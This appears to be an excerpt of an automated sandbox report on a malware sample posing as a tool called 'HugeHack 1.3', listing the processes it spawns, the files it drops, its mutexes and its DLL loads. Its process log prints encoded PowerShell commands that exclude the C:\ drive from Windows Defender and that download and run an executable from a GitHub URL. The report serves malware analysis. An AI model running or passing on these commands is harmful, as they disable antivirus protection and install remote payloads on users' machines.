Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 22_2_013BAD86 AdjustTokenPrivileges,	22_2_013BAD86
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 22_2_013BAD4F AdjustTokenPrivileges,	22_2_013BAD4F
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 23_2_014EAD86 AdjustTokenPrivileges,	23_2_014EAD86
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 23_2_014EAD4F AdjustTokenPrivileges,	23_2_014EAD4F
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 25_2_0060AD86 AdjustTokenPrivileges,	25_2_0060AD86
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 25_2_0060AD4F AdjustTokenPrivileges,	25_2_0060AD4F

Source: C:\Users\user\AppData\Local\Temp\Payload.exe

File created: C:\Users\user\AppData\Roaming\dllhost.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\dllhost.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8024:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8088:120:WilError_03
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\c382eb151c59bd833b24120723eac541
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7892:120:WilError_03

Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe

File created: C:\Users\user\AppData\Local\Temp\ere.js

Jump to behavior

Source: HugeHack 1.3.exe.bin.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: HugeHack 1.3.exe.bin.exe	Virustotal: Detection: 76%
Source: HugeHack 1.3.exe.bin.exe	ReversingLabs: Detection: 91%

Source: javaw.exe	String found in binary or memory: *[Ljavafx/scene/paint/Stop;ass
Source: javaw.exe	String found in binary or memory: *[Ljavafx/scene/paint/Stop;ass
Source: javaw.exe	String found in binary or memory: +com/sun/javafx/application/LauncherImpl$$Lambda$54
Source: javaw.exe	String found in binary or memory: (ZD)[Ljavafx/scene/paint/Stop;
Source: javaw.exe	String found in binary or memory: (ZD)[Ljavafx/scene/paint/Stop;
Source: javaw.exe	String found in binary or memory: (Ljava/util/List<Ljavafx/scene/paint/Stop;>;)Ljava/lang/Object;
Source: javaw.exe	String found in binary or memory: (Ljava/util/List<Ljavafx/scene/paint/Stop;>;)Ljava/lang/Object;
Source: javaw.exe	String found in binary or memory: com/sun/javafx/application/LauncherImpl$$Lambda$49
Source: javaw.exe	String found in binary or memory: -Kcom/sun/javafx/css/parser/StopConverter
Source: javaw.exe	String found in binary or memory: -Kcom/sun/javafx/css/parser/StopConverter
Source: javaw.exe	String found in binary or memory: T(DDDDDZLjavafx/scene/paint/CycleMethod;Ljava/util/List<Ljavafx/scene/paint/Stop;>;)V
Source: javaw.exe	String found in binary or memory: T(DDDDDZLjavafx/scene/paint/CycleMethod;Ljava/util/List<Ljavafx/scene/paint/Stop;>;)V
Source: javaw.exe	String found in binary or memory: -addString
Source: javaw.exe	String found in binary or memory: -AddToSelection
Source: javaw.exe	String found in binary or memory: K/(DDDDZLjavafx/scene/paint/CycleMethod;Ljava/util/List<Ljavafx/scene/paint/Stop;>;)V
Source: javaw.exe	String found in binary or memory: K/(DDDDZLjavafx/scene/paint/CycleMethod;Ljava/util/List<Ljavafx/scene/paint/Stop;>;)V

Source: unknown	Process created: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe "C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe"
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ere.js"
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Process created: C:\Users\user\AppData\Local\Temp\Payload.exe "C:\Users\user\AppData\Local\Temp\Payload.exe"
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Process created: C:\Users\user\AppData\Local\Temp\webhook.exe "C:\Users\user\AppData\Local\Temp\webhook.exe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\SysWOW64\WScript.exe" "C:\Users\user\AppData\Local\Temp\ere.js" /elevate
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\HugeHack.jar"
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Windows\SysWOW64\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBuAG8AbgBBAG0AMAAzADYAOQAvAGEAbQAvAHIAYQB3AC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBSAHUAbgB0AGkAbQBlAEIAcgBvAGsAZQByAC4AZQB4AGUAIgANAAoAJABvAHUAdABwAHUAdAAgAD0AIAAiACQAZQBuAHYAOgBUAGUAbQBwAC8AUgB1AG4AdABpAG0AZQBCAHIAbwBrAGUAcgAuAGUAeABlACIADQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsACAALQBPAHUAdABGAGkAbABlACAAJABvAHUAdABwAHUAdAANAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABvAHUAdABwAHUAdAA=
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe" ..
Source: unknown	Process created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe" ..
Source: unknown	Process created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe" ..
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ere.js"	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Process created: C:\Users\user\AppData\Local\Temp\Payload.exe "C:\Users\user\AppData\Local\Temp\Payload.exe"	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Process created: C:\Users\user\AppData\Local\Temp\webhook.exe "C:\Users\user\AppData\Local\Temp\webhook.exe"	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\HugeHack.jar"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\SysWOW64\WScript.exe" "C:\Users\user\AppData\Local\Temp\ere.js" /elevate	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBuAG8AbgBBAG0AMAAzADYAOQAvAGEAbQAvAHIAYQB3AC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBSAHUAbgB0AGkAbQBlAEIAcgBvAGsAZQByAC4AZQB4AGUAIgANAAoAJABvAHUAdABwAHUAdAAgAD0AIAAiACQAZQBuAHYAOgBUAGUAbQBwAC8AUgB1AG4AdABpAG0AZQBCAHIAbwBrAGUAcgAuAGUAeABlACIADQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsACAALQBPAHUAdABGAGkAbABlACAAJABvAHUAdABwAHUAdAANAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABvAHUAdABwAHUAdAA=	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\

Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
